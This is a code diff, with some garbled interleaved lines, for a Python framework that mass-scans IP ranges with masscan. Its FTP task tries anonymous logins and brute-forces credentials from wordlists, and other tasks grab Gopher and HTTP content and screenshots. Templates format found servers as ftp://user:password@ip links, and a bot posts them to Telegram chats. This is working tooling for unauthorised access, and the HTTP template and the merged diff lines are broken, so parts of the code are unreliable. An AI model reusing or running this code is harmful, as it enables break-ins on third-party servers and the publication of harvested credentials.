continue filter = {"feed.%s" % self._id: {'$exists': False}}
# plugins -> pipelines filter.update({key: value for key, value in chat.get("if", {}).items()})
# it is in progress items = self._data.get(block=False, count=10, filter=filter)
#TODO self._logger.debug(items)
msg = Manager.get_plugin(plugin).Plugin.TelegramMessage(host) if items:
msg.run() self._data.update(items, {'$set': {'feed.%s' % self._id: True}})
if msg.data['txt']:
tbot = telebot.TeleBot(self.lcnf.get('token'), threaded=False) tbot = telebot.TeleBot(self.lcnf.get('token'), threaded=False)
if msg.data['img']: for i in items:
self._logger.debug("Send IP with img %s:%s to %s" % (host['ip'], host['port'], chat_id)) self._logger.debug("@%s: %s", chat_id, i['data']['message'])
tbot.send_photo("@" + chat_id, msg.data['img'], caption=msg.data['txt']) tbot.send_message("@" + chat_id, i['data']['message'])
else:
self._logger.debug("Send IP %s:%s to %s" % (host['ip'], host['port'], chat_id))
tbot.send_message("@" + chat_id, msg.data['txt'])
else:
self._logger.error('Empty text!')
sleep(delay) sleep(delay)
except Exception as e: except Exception as err:
self._logger.warn(e) self._logger.warn(err)

View File

@ -0,0 +1,17 @@
from lib.exec import Task
from jinja2 import Environment, FileSystemLoader
class Jinja2TemplateTask(Task):
def __init__(self, id, root):
super().__init__(id, root)
def _process(self, item):
template = Environment(loader=FileSystemLoader('.')).get_template(self.lcnf.get('path'))
item['data']['message'] = template.render(data = item['data'])
item['steps'][self._id] = True
def _run(self, items):
for item in items:
self._process(item)
return items

View File

@ -1,62 +0,0 @@
plugin:
name: iscan
version: 0.1
pipelines:
FTP:
actions:
- scan
- connect
- metadata
- filetree
df:
Telegram:
action: metadata
chats:
- xai7poozengee2Aen3poMookohthaZ
- aiWeipeighah7vufoHa0ieToipooYe
HTTP:
actions:
- scan
- connect
- metadata
- screenshot
df:
Telegram:
action: screenshot
chats:
- xai7poozengee2Aen3poMookohthaZ
- gohquooFee3duaNaeNuthushoh8di2
Gopher:
actions:
- connect
- collect
df:
Telegram:
action: collect
chats:
- xai7poozengee2Aen3poMookohthaZ
- ohl7AeGah5uo8cho4nae9Eemaeyae3
df:
Telegram:
token: TOKEN
ds:
IPRange:
file: file
Remote:
docker:
services:
selenium:
image: selenium/standalone-chrome:latest
volumes:
- /dev/shm:/dev/shm
environment:
- JAVA_OPTS=-Dselenium.LOGGER.level=WARNING
worker_env:
- SELENIUM_IP=selenium
required_by:
- HTTP

View File

@ -3,23 +3,19 @@
import subprocess import subprocess
import json import json
from jsoncomment import JsonComment from jsoncomment import JsonComment
from lib import Logger
import GeoIP
from Config import cnf
logger = Logger("common") from lib.exec import Task
class MasScanTask(Task):
class MasScan: """Provides data.ports for each of items scanned with masscan"""
def __init__(self, bin_path='/usr/bin/masscan', opts="-sS -Pn -n --wait 0 --max-rate 5000"): def scan(self, ip_list, port_list, bin_path, opts="-sS -Pn -n --wait 0 --max-rate 5000"):
self.bin_path = bin_path """Executes masscan on given IPs/ports"""
self.opts_list = opts.split(' ') bin_path = bin_path
opts_list = opts.split(' ')
def scan(self, ip_list, port_list):
port_list = ','.join([str(p) for p in port_list]) port_list = ','.join([str(p) for p in port_list])
ip_list = ','.join([str(ip) for ip in ip_list]) ip_list = ','.join([str(ip) for ip in ip_list])
process_list = [self.bin_path] process_list = [bin_path]
process_list.extend(self.opts_list) process_list.extend(opts_list)
process_list.extend(['-oJ', '-', '-p']) process_list.extend(['-oJ', '-', '-p'])
process_list.append(port_list) process_list.append(port_list)
process_list.append(ip_list) process_list.append(ip_list)
@ -30,29 +26,27 @@ class MasScan:
result = parser.loads(out) result = parser.loads(out)
return result return result
def scan(items): def _run(self, items):
gi = GeoIP.open(cnf.get("geoip_dat", "/usr/share/GeoIP/GeoIP.dat"), GeoIP.GEOIP_INDEX_CACHE | GeoIP.GEOIP_CHECK_CACHE) ip_list = [i['data']['ip'] for i in items]
logger.debug("Starting scan") port_list = self.lcnf.get("ports")
ms = MasScan()
hosts = ms.scan(ip_list=[i['data']['ip'] for i in items], self._logger.debug("Starting scan, port_list=%s", port_list)
port_list=cnf.get("tasks").get('ftp_scan').get("ports"))
logger.debug(hosts) hosts = self.scan(ip_list=ip_list,
for h in hosts: port_list=port_list,
for port in h['ports']: bin_path=self.lcnf.get('bin_path', "/usr/bin/masscan"))
host = {
'ip': h['ip'], self._logger.debug(hosts)
'port': port['port'], hosts = {h['ip']: h for h in hosts}
'data': { for item in items:
'geo': { if hosts.get(item['data']['ip']):
'country': None, ports = [p['port'] for p in hosts[item['data']['ip']]['ports']]
'city': None if 'ports' in item['data']:
} item['data']['ports'].extend(ports)
} else:
} item['data']['ports'] = ports
geodata = gi.record_by_name(host['ip']) item['steps'][self._id] = True
if geodata: self._logger.debug("Found %s with open ports %s", item['data']['ip'], ports)
if 'country_code3' in geodata and geodata['country_code3']: else:
host['data']['geo']['country'] = geodata['country_code3'] item['steps'][self._id] = False
if 'city' in geodata and geodata['city']: return items
host['data']['geo']['city'] = geodata['city']
logger.debug("Found %s:%s", host['ip'], host['port'])

View File

@ -0,0 +1,91 @@
"""
Basic tasks for FTP services
"""
import ftplib
from lib.exec import Task
class FTPConnectTask(Task): # pylint: disable=too-few-public-methods
"""Tries to connect FTP service with various credentials"""
def _process(self, item):
ftp = ftplib.FTP(host=item['data']['ip'], timeout=self.lcnf.get('timeout', 30))
try:
self._logger.debug('Trying anonymous login')
ftp.login()
except ftplib.error_perm as err:
self._logger.debug('Failed (%s)', err)
else:
self._logger.info('Succeeded with anonymous')
item['data']['username'] = 'anonymous'
item['data']['password'] = ''
return True
if self.lcnf.get('bruteforce', False):
self._logger.debug('Bruteforce enabled, loading usernames and passwords')
usernames = [line.rstrip() for line in open(self.lcnf.get('usernames'), 'r')]
passwords = [line.rstrip() for line in open(self.lcnf.get('passwords'), 'r')]
for username in usernames:
for password in passwords:
self._logger.debug('Checking %s', username + ':' + password)
try:
self._logger.debug('Sending NOOP')
ftp.voidcmd('NOOP')
except IOError as err:
self._logger.debug('IOError occured (%s), attempting to open new connection', err)
ftp = ftplib.FTP(host=item['data']['ip'], timeout=self.lcnf.get('timeout', 30))
try:
self._logger.debug('Trying to log in')
ftp.login(username, password)
except ftplib.error_perm as err:
self._logger.debug('Failed (%s)', err)
continue
else:
self._logger.info('Succeeded with %s', username + ':' + password)
item['data']['username'] = username
item['data']['password'] = password
return True
self._logger.info('Could not connect')
return False
class FTPListFilesTask(Task): # pylint: disable=too-few-public-methods
"""Executes NLST to list files on FTP"""
def _process(self, item):
ftp = ftplib.FTP(host=item['data']['ip'],
user=item['data']['username'],
passwd=item['data']['password'])
filelist = ftp.nlst()
try:
ftp.quit()
except ftplib.Error:
pass
item['data']['files'] = []
for filename in filelist:
item['data']['files'].append(filename)
return True
class FTPFilterFilesTask(Task): # pylint: disable=too-few-public-methods
"""Sets data.filter if FTP contains only junk"""
def _process(self, item):
junk_list = ['incoming', '..', '.ftpquota', '.', 'pub']
files = item['data']['files']
item['data']['filter'] = False
try:
if not files or files[0] == "total 0":
item['data']['filter'] = "Empty"
except IndexError:
pass
if 0 < len(files) <= len(junk_list): # pylint: disable=C1801
match_count = 0
for filename in junk_list:
if filename in files:
match_count += 1
if match_count == len(files):
item['data']['filter'] = "EmptyWithBloatDirs"
return True

View File

@ -0,0 +1,47 @@
"""
Basic tasks for Gopher services
"""
import socket
from lib.exec import Task
class GopherFindTask(Task): # pylint: disable=too-few-public-methods
"""Tries to connect Gopher service"""
@staticmethod
def _recv(sck):
total_data = []
while True:
data = sck.recv(2048)
if not data:
break
total_data.append(data.decode('utf-8'))
return ''.join(total_data)
def _process(self, item):
sock = socket.socket()
sock.settimeout(self.lcnf.get('timeout', 20))
sock.connect((item['data']['ip'], int(70)))
sock.sendall(b'\n\n')
response = self._recv(sock)
sock.close()
self._logger.debug("Parsing result: %s", response)
item['data']['files'] = []
item['data']['filter'] = False
for s in [s for s in response.split("\r\n") if s]:
node = {}
fields = s.split("\t")
self._logger.debug(fields)
node['type'] = fields[0][0]
if len(fields) == 4:
node['name'] = fields[0][1:]
node['path'] = fields[1]
node['serv'] = f"{fields[2]}:{fields[3]}"
item['data']['files'].append(node)
if not item['data']['files']:
raise Exception("Empty server (not Gopher?)")
return True

View File

@ -0,0 +1,60 @@
from lib.exec import Task
from io import BytesIO
import json
import time
import bs4
import requests
import urllib3
from PIL import Image
from bson.binary import Binary
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.proxy import Proxy, ProxyType
import zlib
import netaddr
class HTTPFindTask(Task):
def __init__(self, id, root):
super().__init__(id, root)
def _process(self, item):
urllib3.disable_warnings()
response = requests.get(url='http://%s:%s/' % (self._host['ip'], self._host['port']),
timeout=cnf.stalker.HTTP.timeout,
verify=False)
if response.status_code in [400, 401, 403, 500]:
raise self.PipelineError("Bad response")
self._host['data']['response'] = {}
self._host['data']['response']['code'] = response.status_code
self._host['data']['response']['text'] = response.text
self._host['data']['response']['content'] = response.content
self._host['data']['response']['encoding'] = response.encoding
self._host['data']['response']['headers'] = response.headers
encoding = response.encoding if 'charset' in response.headers.get('content-type', '').lower() else None
soup = bs4.BeautifulSoup(response.content, "html.parser", from_encoding=encoding)
if soup.original_encoding != 'utf-8':
meta = soup.select_one('meta[charset], meta[http-equiv="Content-Type"]')
if meta:
if 'charset' in meta.attrs:
meta['charset'] = 'utf-8'
else:
meta['content'] = 'text/html; charset=utf-8'
self._host['data']['response']['text'] = soup.prettify() # encodes to UTF-8 by default
title = soup.select_one('title')
if title:
if title.string:
title = title.string
else:
title = ""
else:
title = ""
self._host['data']['title'] = title

View File

@ -0,0 +1,10 @@
import tempfile
from lib.exec import Task
class VNCFindTask(Task): # pylint: disable=too-few-public-methods
"""Tries to connect FTP service with various credentials"""
def _process(self, item):
fd, temp_path = tempfile.mkstemp()
print(fd, temp_path)

View File

@ -0,0 +1,6 @@
ftp://{{data['username']}}:{{data['password']}}@{{data['ip']}}
{% for filename in data['files'] -%}
+ {{ filename }}
{% endfor -%}
Geo: {{data['geo']['country']}}/{{data['geo']['city']}}

View File

@ -0,0 +1,15 @@
gopher://{{data['ip']}}/
Dirs:
{% for node in data['files'] -%}
{% if node['type'] == '1' -%}
+ {{node['path']}}
{% endif -%}
{% endfor -%}
Other nodes:
{% for node in data['files'] -%}
{% if node['type'] != '1' and node['type'] != 'i' -%}
+ {{node['path']}}
{{node['name']}}
{% endif -%}
{% endfor -%}
Geo: {{data['geo']['country']}}/{{data['geo']['city']}}

View File

@ -0,0 +1,19 @@
#code{{data['response']['code']}}
server = self._host['data']['response']['headers'].get('Server', None)
{% if server != none %}
" Server: #%s\n" % server
else:
"\n"
if self._host['data']['title']:
"Title: %s\n" % self._host['data']['title']
"Geo: %s/%s\n" % (self._host['data']['geo']['country'], self._host['data']['geo']['city'])
"http://%s:%s/\n" % (self._host['ip'], self._host['port'])
"#http_" + str(int(netaddr.IPAddress(self._host['ip'])))

View File

@ -1,110 +0,0 @@
import ftplib
import netaddr
from Config import cnf
from lib.plugin.plugins import BasePlugin
class Plugin(BasePlugin):
class TelegramMessage(BasePlugin.TelegramMessage):
def _init(self):
self._name = "FTP"
def _generate(self):
self.data['txt'] = "ftp://%s:%s@%s/\n" % \
(self._host['data']['username'], self._host['data']['password'], self._host['ip'])
for filename in self._host['data']['files']:
self.data['txt'] += " + %s\n" % filename
self.data['txt'] += "Geo: %s/%s\n" % (self._host['data']['geo']['country'], self._host['data']['geo']['city'])
self.data['txt'] += "#ftp_" + str(int(netaddr.IPAddress(self._host['ip'])))
class Pipeline(BasePlugin.Pipeline):
def _init(self):
self._name = "FTP"
def run(self):
try:
self._connect()
self._find()
self._filter()
self._push()
except Exception as e:
self._logger.debug("Error occured: %s (%s)", e, self._host['ip'])
else:
self._logger.info("Succeeded for %s" % self._host['ip'])
def _connect(self):
self.ftp = ftplib.FTP(host=self._host['ip'], timeout=cnf.stalker.FTP.timeout)
try:
self._logger.debug('Trying anonymous login')
self.ftp.login()
except ftplib.error_perm:
pass
else:
self._logger.debug('Succeeded with anonymous')
self._host['data']['username'] = 'anonymous'
self._host['data']['password'] = ''
return
if cnf.stalker.FTP.bruteforce:
usernames = []
passwords = []
with open(cnf.stalker.FTP.logins, 'r') as lfh:
for username in lfh:
usernames.append(username.rstrip())
with open(cnf.stalker.FTP.passwords, 'r') as pfh:
for password in pfh:
passwords.append(password.rstrip())
for username in usernames:
for password in passwords:
try:
self.ftp.voidcmd('NOOP')
except IOError:
self.ftp = ftplib.FTP(host=self._host['ip'], timeout=cnf.stalker.FTP.timeout)
self._logger.debug('Trying %s' % (username + ':' + password))
try:
self.ftp.login(username, password)
except ftplib.error_perm:
continue
except:
raise
else:
self._logger.debug('Succeeded with %s' %(username + ':' + password))
self._host['data']['username'] = username
self._host['data']['password'] = password
return
raise Exception('No matching credentials found')
def _find(self):
filelist = self.ftp.nlst()
try:
self.ftp.quit()
except:
# that's weird, but we don't care
pass
try:
if len(filelist) == 0 or filelist[0] == "total 0":
raise self.PipelineError("Empty server")
except IndexError:
pass
self._host['data']['files'] = []
for fileName in filelist:
self._host['data']['files'].append(fileName)
def _filter(self):
self._host['data']['filter'] = False
if len(self._host['data']['files']) == 0:
self._host['data']['filter'] = "Empty"
elif len(self._host['data']['files']) < 6:
match = 0
for f in 'incoming', '..', '.ftpquota', '.', 'pub':
if f in self._host['data']['files']:
match += 1
if match == len(self._host['data']['files']):
self._host['data']['filter'] = "EmptyWithSystemDirs"

View File

@ -1,70 +0,0 @@
import socket
import netaddr
from Config import cnf
from lib.plugin.plugins import BasePlugin
class Plugin(BasePlugin):
class TelegramMessage(BasePlugin.TelegramMessage):
def _init(self):
self._name = "Gopher"
def _generate(self):
self.data['txt'] = "gopher://%s/\n" % self._host['ip']
self.data['txt'] += "Dirs:\n"
for dir in [f for f in self._host['data']['files'] if f['type'] == '1']:
self.data['txt'] += " + %s\n" % dir['path']
self.data['txt'] += "Other nodes:\n"
for file in [f for f in self._host['data']['files'] if f['type'] != '1' and f['type'] != 'i']:
self.data['txt'] += " + %s\n %s\n" % (file['path'], file['name'])
self.data['txt'] += "Geo: %s/%s\n" % (self._host['data']['geo']['country'], self._host['data']['geo']['city'])
self.data['txt'] += "#gopher_" + str(int(netaddr.IPAddress(self._host['ip'])))
class Pipeline(BasePlugin.Pipeline):
def _init(self):
self._name = "Gopher"
def run(self):
try:
self._find()
self._push()
except Exception as e:
self._logger.debug("Error occured: %s (%s)", e, self._host['ip'])
else:
self._logger.info("Succeeded for %s" % self._host['ip'])
def _recv(self, sck):
total_data = []
while True:
data = sck.recv(2048)
if not data:
break
total_data.append(data.decode('utf-8'))
return ''.join(total_data)
def _find(self):
sock = socket.socket()
sock.settimeout(cnf.stalker.Gopher.timeout)
sock.connect((self._host['ip'], int(self._host['port'])))
sock.sendall(b'\n\n')
response = self._recv(sock)
sock.close()
self._logger.debug("Parsing result")
self._host['data']['files'] = []
self._host['data']['filter'] = False
for s in [s for s in response.split("\r\n") if s]:
node = {}
fields = s.split("\t")
self._logger.debug(fields)
node['type'] = fields[0][0]
if len(fields) == 4:
node['name'] = fields[0][1:]
node['path'] = fields[1]
node['serv'] = f"{fields[2]}:{fields[3]}"
self._host['data']['files'].append(node)
if not self._host['data']['files']:
raise self.PipelineError("Empty server (not Gopher?)")

View File

@ -1 +0,0 @@
plugins formed in old plugin format

View File

@ -1,45 +0,0 @@
from threading import Thread
from time import sleep
class A: # NOOP
def __init__(self, thread = None):
if thread:
self.__thread = Thread(target=thread)
self._running = False
self._init()
def _init(self):
pass
def start(self):
self._running = True
self.__thread.daemon = True
self.__thread.start()
def stop(self):
self._running = False
self.__thread.join()
def __run(self):
while(self._running):
print('NOOP')
sleep(1)
class B(A): # NOOP
def __init__(self):
super().__init__(self.__run)
def __run(self):
while(self._running):
print('OP')
sleep(1)
class C(A): # NOOP
def __run(self):
while(self._running):
print('OP')
sleep(1)
def _init(self):
self.__thread = Thread(target=self.__run)

View File

@ -1,2 +0,0 @@
#from .scan import scan
#from .stalk import stalk

View File

@ -1,8 +0,0 @@
from lib.plugin import Manager
# legacy
# why legacy?
def worker(host, plugin):
p = Manager.get_plugin(plugin)
p.Plugin.Pipeline(host, plugin)
del p
# cool bro

View File

@ -1,10 +1,10 @@
import logging import logging
from Config import cnf as config
import importlib import importlib
import sys, os import sys, os
from Config import cnf as config
class Logger(logging.Logger): class Logger(logging.Logger):
"""Logger. standard logging logger with some shitcode on the top""" """Logger. standard logging logger with some shitcode on the top"""
def __init__(self, name): def __init__(self, name):
@ -74,8 +74,8 @@ class Logger(logging.Logger):
class Loadable: class Loadable:
"""parent for loadable from configuration""" """parent for loadable from configuration"""
def __init__(self, id, root=config): def __init__(self, id, root=config):
self.cnf = config self.cnf = config # global config
self.lcnf = root[id] self.lcnf = root[id] # local config
self._id = id self._id = id
@ -95,6 +95,9 @@ class Loader:
return getattr(result, name) return getattr(result, name)
@classmethod @classmethod
def by_id(cls, section, id): def by_id(cls, section, id) -> Loadable:
l = cls(config[section][id].get('package')) """Returns instantiated object of class provided in configuration"""
return l.get(config[section][id].get('service'))(id=id, root=config[section]) # prepares Loader for certain package
loader = cls(config.get(section).get(id).get('package'))
# loads class from this package and returns instantiated object of this class
return loader.get(config.get(section).get(id).get('service'))(id=id, root=config.get(section))

View File

@ -1,5 +1,4 @@
#!/usr/bin/python3 #!/usr/bin/python3
# -*- coding: utf-8 -*-
import time import time
@ -20,22 +19,24 @@ class Core:
self._services.append(service) self._services.append(service)
def start(self): def start(self):
"""Starts all loaded services"""
self.logger.info("Starting") self.logger.info("Starting")
for service in self._services: for service in self._services:
service.start() service.start()
self.logger.info("Started") self.logger.info("Started")
def stop(self): def stop(self):
"""Stops all loaded services"""
self.logger.info("Stopping Core") self.logger.info("Stopping Core")
for service in self._services: for service in self._services:
service.stop() service.stop()
self.logger.info("Stopped") self.logger.info("Stopped")
if __name__ == '__main__': if __name__ == '__main__':
core = Core() CORE = Core()
core.start() CORE.start()
try: try:
while True: while True:
time.sleep(1) time.sleep(1)
except KeyboardInterrupt: except KeyboardInterrupt:
core.stop() CORE.stop()

View File

@ -12,3 +12,4 @@ zmq
jsoncomment jsoncomment
rq rq
pyyaml pyyaml
jinja2